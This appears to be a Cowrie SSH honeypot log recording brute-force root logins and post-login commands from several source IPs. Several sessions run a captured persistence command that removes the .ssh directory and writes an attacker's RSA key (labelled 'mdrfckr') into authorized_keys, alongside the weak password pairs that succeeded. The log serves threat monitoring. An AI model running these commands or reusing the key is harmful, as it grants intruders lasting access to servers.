{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:52:27.302868Z","src_ip":"185.152.45.241","session":"6fa8fcf3e5de"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:52:27.743276Z","src_ip":"185.152.45.241","session":"6fa8fcf3e5de"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:52:28.794358Z","src_ip":"185.152.45.241","session":"6fa8fcf3e5de"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11832,"dst_ip":"1.2.3.4","dst_port":22,"session":"71d36eac1cbe","protocol":"ssh","message":"New connection: 185.152.45.241:11832 (1.2.3.4:22) [session: 71d36eac1cbe]","sensor":"my-vps","timestamp":"2025-09-09T02:52:28.839545Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:52:28.840474Z","src_ip":"185.152.45.241","session":"71d36eac1cbe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:52:28.893898Z","src_ip":"185.152.45.241","session":"71d36eac1cbe"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:52:29.149288Z","src_ip":"185.152.45.241","session":"71d36eac1cbe"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:52:29.198886Z","src_ip":"185.152.45.241","session":"1ac29dafbcee"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:52:29.199978Z","src_ip":"185.152.45.241","session":"71d36eac1cbe"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58514,"dst_ip":"1.2.3.4","dst_port":22,"session":"186573d4c53f","protocol":"ssh","message":"New connection: 217.72.205.35:58514 (1.2.3.4:22) [session: 186573d4c53f]","sensor":"my-vps","timestamp":"2025-09-09T02:53:18.560923Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:53:18.561995Z","src_ip":"217.72.205.35","session":"186573d4c53f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45380,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f45a50786d5","protocol":"ssh","message":"New connection: 212.227.235.229:45380 (1.2.3.4:22) [session: 0f45a50786d5]","sensor":"my-vps","timestamp":"2025-09-09T02:53:29.392106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:53:29.393213Z","src_ip":"212.227.235.229","session":"0f45a50786d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:53:29.553946Z","src_ip":"212.227.235.229","session":"0f45a50786d5"}
{"eventid":"cowrie.login.success","username":"root","password":"asdfgh","message":"login attempt [root/asdfgh] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:53:30.238430Z","src_ip":"212.227.235.229","session":"0f45a50786d5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:53:30.621971Z","src_ip":"212.227.235.229","session":"0f45a50786d5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:53:30.622754Z","src_ip":"212.227.235.229","session":"0f45a50786d5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:53:30.623743Z","src_ip":"212.227.235.229","session":"0f45a50786d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:53:30.786489Z","src_ip":"212.227.235.229","session":"0f45a50786d5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:53:31.123727Z","src_ip":"212.227.235.229","session":"0f45a50786d5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:53:31.124428Z","src_ip":"212.227.235.229","session":"0f45a50786d5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:53:31.287329Z","src_ip":"212.227.235.229","session":"0f45a50786d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:53:31.288245Z","src_ip":"212.227.235.229","session":"0f45a50786d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45382,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb08afa196ff","protocol":"ssh","message":"New connection: 212.227.235.229:45382 (1.2.3.4:22) [session: cb08afa196ff]","sensor":"my-vps","timestamp":"2025-09-09T02:53:31.449070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:53:31.449966Z","src_ip":"212.227.235.229","session":"cb08afa196ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:53:31.609887Z","src_ip":"212.227.235.229","session":"cb08afa196ff"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:53:32.289164Z","src_ip":"212.227.235.229","session":"cb08afa196ff"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:53:33.451012Z","src_ip":"212.227.235.229","session":"cb08afa196ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57842,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f59321de327","protocol":"ssh","message":"New connection: 212.227.235.229:57842 (1.2.3.4:22) [session: 9f59321de327]","sensor":"my-vps","timestamp":"2025-09-09T02:53:33.592010Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:53:33.592923Z","src_ip":"212.227.235.229","session":"9f59321de327"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:53:33.741845Z","src_ip":"212.227.235.229","session":"9f59321de327"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:53:34.379023Z","src_ip":"212.227.235.229","session":"9f59321de327"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:53:34.529599Z","src_ip":"212.227.235.229","session":"9f59321de327"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:53:34.541092Z","src_ip":"212.227.235.229","session":"0f45a50786d5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:53:34.698418Z","src_ip":"79.124.8.120","session":"0d10d27996e4"}
{"eventid":"cowrie.session.closed","duration":180.1026635169983,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:53:34.703785Z","src_ip":"79.124.8.120","session":"0d10d27996e4"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11833,"dst_ip":"1.2.3.4","dst_port":22,"session":"1dc65880aa0c","protocol":"ssh","message":"New connection: 185.152.45.241:11833 (1.2.3.4:22) [session: 1dc65880aa0c]","sensor":"my-vps","timestamp":"2025-09-09T02:53:42.604744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:53:42.605633Z","src_ip":"185.152.45.241","session":"1dc65880aa0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:53:42.659018Z","src_ip":"185.152.45.241","session":"1dc65880aa0c"}
{"eventid":"cowrie.login.success","username":"root","password":"administrator","message":"login attempt [root/administrator] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:53:42.894975Z","src_ip":"185.152.45.241","session":"1dc65880aa0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:53:43.051337Z","src_ip":"185.152.45.241","session":"1dc65880aa0c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:53:43.052118Z","src_ip":"185.152.45.241","session":"1dc65880aa0c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:53:43.052907Z","src_ip":"185.152.45.241","session":"1dc65880aa0c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:53:43.104250Z","src_ip":"185.152.45.241","session":"1dc65880aa0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:53:43.263630Z","src_ip":"185.152.45.241","session":"1dc65880aa0c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:53:43.264491Z","src_ip":"185.152.45.241","session":"1dc65880aa0c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:53:43.319287Z","src_ip":"185.152.45.241","session":"1dc65880aa0c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:53:43.320062Z","src_ip":"185.152.45.241","session":"1dc65880aa0c"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11836,"dst_ip":"1.2.3.4","dst_port":22,"session":"827c20aacd86","protocol":"ssh","message":"New connection: 185.152.45.241:11836 (1.2.3.4:22) [session: 827c20aacd86]","sensor":"my-vps","timestamp":"2025-09-09T02:53:43.363615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:53:43.364521Z","src_ip":"185.152.45.241","session":"827c20aacd86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:53:43.413936Z","src_ip":"185.152.45.241","session":"827c20aacd86"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:53:43.644095Z","src_ip":"185.152.45.241","session":"827c20aacd86"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:53:44.694413Z","src_ip":"185.152.45.241","session":"827c20aacd86"}
